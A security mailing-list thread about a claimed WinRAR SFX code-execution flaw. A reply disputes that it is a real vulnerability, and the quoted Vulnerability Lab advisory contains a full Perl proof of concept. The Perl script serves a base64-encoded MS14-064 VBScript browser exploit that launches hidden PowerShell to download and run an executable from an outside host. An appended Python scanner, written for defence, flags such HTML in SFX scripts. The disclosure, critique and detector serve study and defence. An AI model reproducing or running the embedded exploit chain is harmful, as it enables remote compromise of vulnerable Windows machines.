Correct me if I'm wrong, but the vulnerability can be summarized as: if you run an untrusted .exe you might execute malicious code?
I hardly see this as giving anything new to the attacker, who can just create a malicious exe file, set the WinRAR SFX icon and send it to the victim. Keep in mind that not every unexpected behavior or software bug is a security vulnerability. (and no, potential AV bypass doesn't make it a vulnerability either)

Cheers,
Gynvael

On Mon, 28 Sep 2015 10:27 Vulnerability Lab <resea...@vulnerability-lab.com> wrote:

> Document Title:
> ===============
> WinRAR SFX v5.21 - Remote Code Execution Vulnerability
>
>
> References (Source):
> ====================
> http://www.vulnerability-lab.com/get_content.php?id=1608
>
> Video: https://www.youtube.com/watch?v=fo0l0oT4468
>
>
> Release Date:
> =============
> 2015-09-28
>
>
> Vulnerability Laboratory ID (VL-ID):
> ====================================
> 1608
>
>
> Common Vulnerability Scoring System:
> ====================================
> 9
>
>
> Product & Service Introduction:
> ===============================
> WinRAR, with over 500 million users worldwide, is by far the most popular
> compression program and therefore the best way to pack files securely and
> efficiently for a data transfer, to speed up the data transfer via
> e-mail, and to securely store optimized files.
>
> (Copy of the Homepage: http://www.win-rar.com/start.html )
>
>
> Abstract Advisory Information:
> ==============================
> An independent vulnerability laboratory researcher discovered a code
> execution vulnerability in the official WinRAR SFX v5.21 software.
>
>
> Vulnerability Disclosure Timeline:
> ==================================
> 2015-09-28: Public Disclosure (Vulnerability Laboratory)
>
>
> Discovery Status:
> =================
> Published
>
>
> Exploitation Technique:
> =======================
> Remote
>
>
> Severity Level:
> ===============
> Critical
>
>
> Technical Details & Description:
> ================================
> A remote code execution vulnerability has been discovered in the official
> WinRAR SFX v5.21 software.
> The vulnerability allows remote attackers to execute unauthorized
> system-specific code to compromise a target system.
>
> The issue is located in the `Text and Icon` function of the `Text to
> display in SFX window` module. Remote attackers are able to generate their
> own compressed archives with malicious payloads to execute system-specific
> code for compromise. The attackers save the maliciously generated HTML code
> in the SFX archive input. This results in system-specific code execution
> when a target user or system opens the compressed archive.
>
> The security risk of the code execution vulnerability is estimated as
> critical with a cvss (common vulnerability scoring system) count of 9.2.
> Exploitation of the code execution vulnerability requires low user
> interaction (open file) without a privileged system or restricted user
> account.
> Successful exploitation of the remote code execution vulnerability in the
> WinRAR SFX software results in system, network or device compromise.
>
>
> Proof of Concept (PoC):
> =======================
> The code execution vulnerability can be exploited by remote attackers
> without a privileged system user account or user interaction.
> For security demonstration or to reproduce the vulnerability follow the
> provided information and steps below to continue.
>
> Manual steps to reproduce the vulnerability ...
> 1. Run the perl code: perl poc.pl
> 2. Right-click on any file and select "Add to archive..."
> 3. Select "Create SFX archive"
> 4. Go to the Advanced menu and select "SFX options..."
> 5. Go to the "Text and icon" menu
> 6. Copy the perl output (HTML) and paste it into "Text to display in SFX
> window"
> 7. Click OK -- OK
> 8. Your SFX file is created
> 9. Just open the SFX file
> 10. Your link downloads/executes on your target
> 11. Successful reproduction of the code execution vulnerability!
>
>
> PoC: Exploit Code
>
> #!/usr/bin/perl
> # Title : WinRaR SFX - Remote Code Execution
> # Affected Versions: All Version
> # Tested on Windows 7 / Server 2008
> #
> # Author: Mohammad Reza Espargham
> # Linkedin: https://ir.linkedin.com/in/rezasp
> # E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
> # Website: www.reza.es
> # Twitter: https://twitter.com/rezesp
> # FaceBook: https://www.facebook.com/reza.espargham
> #
> # ID: MS14-064
>
> use strict;
> use warnings;
> use IO::Socket;
> use MIME::Base64 qw( decode_base64 );
> use Socket 'inet_ntoa';
> use Sys::Hostname 'hostname';
>
> print " Mohammad Reza Espargham\n\n";
>
> # Local address the SFX window will be redirected to.
> my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));
>
> my $port = 80;
>
> # HTML to paste into "Text to display in SFX window": a meta refresh that
> # sends the SFX window to this server as soon as the archive is opened.
> print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n" if($port==80);
> print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . ':' . $port . '"></head></html>'."\n\n" if($port!=80);
>
> my $server = new IO::Socket::INET( Proto     => 'tcp',
>                                    LocalPort => $port,
>                                    Listen    => SOMAXCONN,
>                                    ReuseAddr => 1)
>     or die "Unable to create server socket";
>
> # Server loop: read the request headers, then answer every request with the page.
> while(my $client = $server->accept())
> {
>     my $client_info;
>     while(<$client>)
>     {
>         last if /^\r\n$/;
>         $client_info .= $_;
>     }
>     incoming($client, $client_info);
> }
>
> sub incoming
> {
>     print "\n=== Incoming Request:\n";
>     my $client = shift;
>     print $client &buildResponse($client, shift);
>     close($client);
> }
>
> sub buildResponse
> {
>     my $client = shift;
>     my $client_info = shift;
>
>     # Base64-encoded page served to the SFX window: the public MS14-064
>     # (CVE-2014-6332, OLE automation array) VBScript exploit, whose
>     # runmumaa() launches a hidden powershell.exe that downloads putty.exe
>     # as load.exe and runs it. decode_base64 ignores the line breaks.
>     my $poc="CjxodG1sPgo8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVt
> dWxhdGVJRTgiID4KPGhlYWQ+CjwvaGVhZD4KPGJvZHk+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJT
> Y3JpcHQiPgoKZnVuY3Rpb24gcnVubXVtYWEoKSAKT24gRXJyb3IgUmVzdW1lIE5leHQKc2V0IHNo
> ZWxsPWNyZWF0ZW9iamVjdCgiU2hlbGwuQXBwbGljYXRpb24iKQpjb21tYW5kPSJJbnZva2UtRXhw
> cmVzc2lvbiAkKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgn
> aHR0cDovL3RoZS5lYXJ0aC5saS9+c2d0YXRoYW0vcHV0dHkvbGF0ZXN0L3g4Ni9wdXR0eS5leGUn
> LCdsb2FkLmV4ZScpOyQoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4
> ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaGVsbC5TaGVsbEV4ZWN1dGUgInBvd2Vyc2hlbGwuZXhlIiwg
> Ii1Db21tYW5kICIgJiBjb21tYW5kLCAiIiwgInJ1bmFzIiwgMAplbmQgZnVuY3Rpb24KPC9zY3Jp
> cHQ+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgogIApkaW0gICBhYSgpCmRpbSAgIGFi
> KCkKZGltICAgYTAKZGltICAgYTEKZGltICAgYTIKZGltICAgYTMKZGltICAgd2luOXgKZGltICAg
> aW50VmVyc2lvbgpkaW0gICBybmRhCmRpbSAgIGZ1bmNsYXNzCmRpbSAgIG15YXJyYXkKIApCZWdp
> bigpCiAKZnVuY3Rpb24gQmVnaW4oKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgaW5mbz1OYXZp
> Z2F0b3IuVXNlckFnZW50CiAKICBpZihpbnN0cihpbmZvLCJXaW42NCIpPjApICAgdGhlbgogICAg
> IGV4aXQgICBmdW5jdGlvbgogIGVuZCBpZgogCiAgaWYgKGluc3RyKGluZm8sIk1TSUUiKT4wKSAg
> IHRoZW4gCiAgICAgICAgICAgICBpbnRWZXJzaW9uID0gQ0ludChNaWQoaW5mbywgSW5TdHIoaW5m
> bywgIk1TSUUiKSArIDUsIDIpKSAgIAogIGVsc2UKICAgICBleGl0ICAgZnVuY3Rpb24gIAogICAg
> ICAgICAgICAgIAogIGVuZCBpZgogCiAgd2luOXg9MAogCiAgQmVnaW5Jbml0KCkKICBJZiBDcmVh
> dGUoKT1UcnVlIFRoZW4KICAgICBteWFycmF5PSAgICAgICAgY2hydygwMSkmY2hydygyMTc2KSZj
> aHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKQogICAg
> IG15YXJyYXk9bXlhcnJheSZjaHJ3KDAwKSZjaHJ3KDMyNzY3KSZjaHJ3KDAwKSZjaHJ3KDApCiAK
> ICAgICBpZihpbnRWZXJzaW9uPDQpIHRoZW4KICAgICAgICAgZG9jdW1lbnQud3JpdGUoIjxicj4g
> SUUiKQogICAgICAgICBkb2N1bWVudC53cml0ZShpbnRWZXJzaW9uKQogICAgICAgICBydW5zaGVs
> bGNvZGUoKSAgICAgICAgICAgICAgICAgICAgCiAgICAgZWxzZSAgCiAgICAgICAgICBzZXRub3Rz
> YWZlbW9kZSgpCiAgICAgZW5kIGlmCiAgZW5kIGlmCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIEJl
> Z2luSW5pdCgpCiAgIFJhbmRvbWl6ZSgpCiAgIHJlZGltIGFhKDUpCiAgIHJlZGltIGFiKDUpCiAg
> IGEwPTEzKzE3KnJuZCg2KQogICBhMz03KzMqcm5kKDUpCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9u
> IENyZWF0ZSgpCiAgT24gRXJyb3IgUmVzdW1lIE5leHQKICBkaW0gaQogIENyZWF0ZT1GYWxzZQog
> IEZvciBpID0gMCBUbyA0MDAKICAgIElmIE92ZXIoKT1UcnVlIFRoZW4KICAgICAgIENyZWF0ZT1U
> cnVlCiAgICAgICBFeGl0IEZvcgogICAgRW5kIElmIAogIE5leHQKZW5kIGZ1bmN0aW9uCiAKc3Vi
> IHRlc3RhYSgpCmVuZCBzdWIKIApmdW5jdGlvbiBteWRhdGEoKQogICAgT24gRXJyb3IgUmVzdW1l
> IE5leHQKICAgICBpPXRlc3RhYQogICAgIGk9bnVsbAogICAgIHJlZGltICBQcmVzZXJ2ZSBhYShh
> MikgIAogICAKICAgICBhYigwKT0wCiAgICAgYWEoYTEpPWkKICAgICBhYigwKT02LjM2NTk4NzM3
> NDM3ODAxRS0zMTQKIAogICAgIGFhKGExKzIpPW15YXJyYXkKICAgICBhYigyKT0xLjc0MDg4NTM0
> NzMxMzI0RS0zMTAgIAogICAgIG15ZGF0YT1hYShhMSkKICAgICByZWRpbSAgUHJlc2VydmUgYWEo
> YTApICAKZW5kIGZ1bmN0aW9uIAogCiAKZnVuY3Rpb24gc2V0bm90c2FmZW1vZGUoKQogICAgT24g
> RXJyb3IgUmVzdW1lIE5leHQKICAgIGk9bXlkYXRhKCkgIAogICAgaT1ydW0oaSs4KQogICAgaT1y
> dW0oaSsxNikKICAgIGo9cnVtKGkrJmgxMzQpICAKICAgIGZvciBrPTAgdG8gJmg2MCBzdGVwIDQK
> ICAgICAgICBqPXJ1bShpKyZoMTIwK2spCiAgICAgICAgaWYoaj0xNCkgdGhlbgogICAgICAgICAg
> ICAgIGo9MCAgICAgICAgICAKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAg
> ICAgICAgICAgIAogICAgIGFhKGExKzIpKGkrJmgxMWMrayk9YWIoNCkKICAgICAgICAgICAgICBy
> ZWRpbSAgUHJlc2VydmUgYWEoYTApICAKIAogICAgIGo9MCAKICAgICAgICAgICAgICBqPXJ1bShp
> KyZoMTIwK2spICAgCiAgICAgICAgICAKICAgICAgICAgICAgICAgRXhpdCBmb3IKICAgICAgICAg
> ICBlbmQgaWYKIAogICAgbmV4dCAKICAgIGFiKDIpPTEuNjk3NTk2NjMzMTY3NDdFLTMxMwogICAg
> cnVubXVtYWEoKSAKZW5kIGZ1bmN0aW9uCiAKZnVuY3Rpb24gT3ZlcigpCiAgICBPbiBFcnJvciBS
> ZXN1bWUgTmV4dAogICAgZGltIHR5cGUxLHR5cGUyLHR5cGUzCiAgICBPdmVyPUZhbHNlCiAgICBh
> MD1hMCthMwogICAgYTE9YTArMgogICAgYTI9YTArJmg4MDAwMDAwCiAgIAogICAgcmVkaW0gIFBy
> ZXNlcnZlIGFhKGEwKSAKICAgIHJlZGltICAgYWIoYTApICAgICAKICAgCiAgICByZWRpbSAgUHJl
> c2VydmUgYWEoYTIpCiAgIAogICAgdHlwZTE9MQogICAgYWIoMCk9MS4xMjM0NTY3ODkwMTIzNDU2
> Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKGEwKT0xMAogICAgICAgICAgIAogICAgSWYoSXNPYmplY3Qo
> YWEoYTEtMSkpID0gRmFsc2UpIFRoZW4KICAgICAgIGlmKGludFZlcnNpb248NCkgdGhlbgogICAg
> ICAgICAgIG1lbT1jaW50KGEwKzEpKjE2ICAgICAgICAgICAgIAogICAgICAgICAgIGo9dmFydHlw
> ZShhYShhMS0xKSkKICAgICAgICAgICBpZigoaj1tZW0rNCkgb3IgKGoqOD1tZW0rOCkpIHRoZW4K
> ICAgICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAg
> ICAgICAgICAgIElmKElzT2JqZWN0KGFhKGExKSkgPSBGYWxzZSApIFRoZW4gICAgICAgICAgICAgCg
> ICAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAgICAg
> IGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgIGVuZCBpZgogICAgICAgICAgIGVs
> c2UKICAgICAgICAgICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKICAgICAgICAgICAgIGV4aXQg
> IGZ1bmN0aW9uCiAKICAgICAgICAgICBlbmQgaWYgCiAgICAgICAgZWxzZQogICAgICAgICAgIGlm
> KHZhcnR5cGUoYWEoYTEtMSkpPD4wKSAgVGhlbiAgICAKICAgICAgICAgICAgICBJZihJc09iamVj
> dChhYShhMSkpID0gRmFsc2UgKSBUaGVuCiAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUo
> YWEoYTEpKQogICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICBl
> bmQgaWYKICAgICAgICBlbmQgaWYKICAgIGVuZCBpZgogICAgICAgICAgICAgICAKICAgICAKICAg
> IElmKHR5cGUxPSZoMmY2NikgVGhlbiAgICAgICAgIAogICAgICAgICAgT3Zlcj1UcnVlICAgICAg
> CiAgICBFbmQgSWYgIAogICAgSWYodHlwZTE9JmhCOUFEKSBUaGVuCiAgICAgICAgICBPdmVyPVRy
> dWUKICAgICAgICAgIHdpbjl4PTEKICAgIEVuZCBJZiAgCiAKICAgIHJlZGltICBQcmVzZXJ2ZSBh
> YShhMCkgICAgICAgICAgCiAgICAgICAgIAplbmQgZnVuY3Rpb24KIApmdW5jdGlvbiBydW0oYWRk
> KSAKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAK
> ICAgCiAgICBhYigwKT0wICAgCiAgICBhYShhMSk9YWRkKzQgICAgIAogICAgYWIoMCk9MS42OTc1
> OTY2MzMxNjc0N0UtMzEzICAgICAgIAogICAgcnVtPWxlbmIoYWEoYTEpKSAgCiAgICAKICAgIGFi
> KDApPTAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKZW5kIGZ1bmN0aW9uCiAKPC9zY3JpcHQ+
> CiAKPC9ib2R5Pgo8L2h0bWw+";
>     $poc = decode_base64($poc);
>
>     my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n$poc";
>     return $r;
> }
>
>
> Security Risk:
> ==============
> The security risk of the code execution vulnerability in the WinRAR SFX
> software is estimated as high. (CVSS 7.4)
>
>
> Credits & Authors:
> ==================
> Mohammad Reza Espargham [https://ir.linkedin.com/in/rezasp] (m...@reza.es
> or reza.esparg...@gmail.com] (www.reza.es)
>
>
> Disclaimer & Information:
> =========================
> The information provided in this advisory is provided as it is without any
> warranty. Vulnerability Lab disclaims all warranties, either expressed
> or implied, including the warranties of merchantability and capability for
> a particular purpose. Vulnerability-Lab or its suppliers are not liable
> in any case of damage, including direct, indirect, incidental,
> consequential loss of business profits or special damages, even if
> Vulnerability-Lab or its suppliers have been advised of the possibility of
> such damages. Some states do not allow the exclusion or limitation of
> liability for consequential or incidental damages so the foregoing
> limitation may not apply. We do not approve or encourage anybody to break
> any vendor licenses, policies, deface websites, hack into databases or
> trade with fraud/stolen material.
>
> Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
> Contact:    ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com
> Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
> Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
> Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
> Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
>
> Any modified copy or reproduction, including partial usage, of this
> file requires authorization from Vulnerability Laboratory. Permission to
> electronically redistribute this alert in its unmodified form is granted.
> All other rights, including the use of other media, are reserved by
> Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
> advisories, source code, videos and other information on this website
> are trademarks of the vulnerability-lab team & the specific authors or managers.
> To record, list (feed), modify, use or edit our material contact
> (ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get
> permission.
>
> Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
>
>
>
> --
> VULNERABILITY LABORATORY - RESEARCH TEAM
> SERVICE: www.vulnerability-lab.com
> CONTACT: resea...@vulnerability-lab.com
> PGP KEY: http://www.vulnerability-lab.com/keys/ad...@vulnerability-lab.com%280x198E9928%29.txt
>
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
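A triage check a practitioner would want after reading this thread, written here as an added example (it is not code from the advisory, from Vulnerability Lab, or from WinRAR): WinRAR stores the SFX options, including the "Text to display in SFX window" block from step 6, as a small script in the archive comment, and that Text block is what the SFX window renders as HTML. The scanner below parses that script syntax and flags the constructs the PoC relies on (a meta refresh to an external URL) plus script, frames and objects in Text and License blocks; it also flags Setup= and Presetup= lines, since an SFX script can launch a program directly, which is the capability Gynvael's reply points at. The three sample scripts are constructed for this example, and obtaining the comment with `rar cw archive.exe comment.txt` first is an assumed workflow, not something the advisory describes.

```python
import re
import sys

# Constructed sample SFX scripts. They are not from the original post; they
# imitate what WinRAR stores in the archive comment after step 6 of the
# advisory (HTML pasted into "Text to display in SFX window").
SAMPLE_POC_STYLE = """\
Title=Quarterly report
Text
{
<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://192.0.2.10"></head></html>
}
"""

SAMPLE_BENIGN = """\
Title=Quarterly report
Text
{
<html><body><b>Report Q3</b><p>Files are extracted to the chosen folder.</p></body></html>
}
"""

SAMPLE_SETUP = """\
; an SFX that simply runs a program after extraction
Title=Installer
Setup=update.exe
Silent=1
"""

# HTML constructs that make the SFX window do something other than display
# text: navigate elsewhere (the PoC's meta refresh), run script, or load
# subdocuments and plugins. List order is the order findings are reported in.
ACTIVE_HTML = [
    ("meta-refresh", re.compile(r'<meta[^>]+http-equiv\s*=\s*["\']?refresh', re.I)),
    ("script", re.compile(r"<script\b", re.I)),
    ("frame-or-object", re.compile(r"<(?:iframe|frame|object|embed)\b", re.I)),
    ("external-url", re.compile(r"\b(?:https?|ftp)://", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
]

# Documented WinRAR SFX script commands that launch a program.
LAUNCH_COMMANDS = {"setup", "presetup"}


def parse_sfx_script(script):
    """Parse WinRAR SFX script syntax into (command, value, block) triples.

    A command is a 'Name' or 'Name=value' line; it may be followed by a
    multi-line block delimited by '{' and '}' on their own lines (Text,
    License). Lines starting with ';' are comments.
    """
    lines = script.splitlines()
    commands = []
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith(";"):
            continue
        name, _, value = line.partition("=")
        block = None
        if i < len(lines) and lines[i].strip() == "{":
            i += 1
            body = []
            while i < len(lines) and lines[i].strip() != "}":
                body.append(lines[i])
                i += 1
            i += 1  # skip the closing '}'
            block = "\n".join(body)
        commands.append((name.strip(), value.strip(), block))
    return commands


def scan_sfx_script(script):
    """Return human-readable findings for one SFX script (empty list if clean)."""
    findings = []
    for name, value, block in parse_sfx_script(script):
        key = name.lower()
        if key in LAUNCH_COMMANDS:
            findings.append(f'{name}: launches "{value}"')
        if key in ("text", "license") and block is not None:
            for label, pattern in ACTIVE_HTML:
                match = pattern.search(block)
                if match:
                    findings.append(f"{name}: {label} ({match.group(0)})")
    return findings


if __name__ == "__main__":
    # Usage: python sfx_scan.py comment.txt  (comment dumped beforehand, e.g. with `rar cw`)
    # With no argument the constructed samples are scanned.
    sources = {"poc-style": SAMPLE_POC_STYLE, "benign": SAMPLE_BENIGN, "setup": SAMPLE_SETUP}
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            sources = {sys.argv[1]: fh.read()}
    for label, text in sources.items():
        hits = scan_sfx_script(text)
        print(f"{label}: {'; '.join(hits) if hits else 'no active content'}")
```

The external-url rule deliberately fires on any absolute http/ftp URL, not only inside a meta refresh: an `<img src>` or `<a href>` to an attacker host is enough for the SFX window to make an outbound request when opened, which is the first observable step of the PoC even before any browser-engine exploit is served.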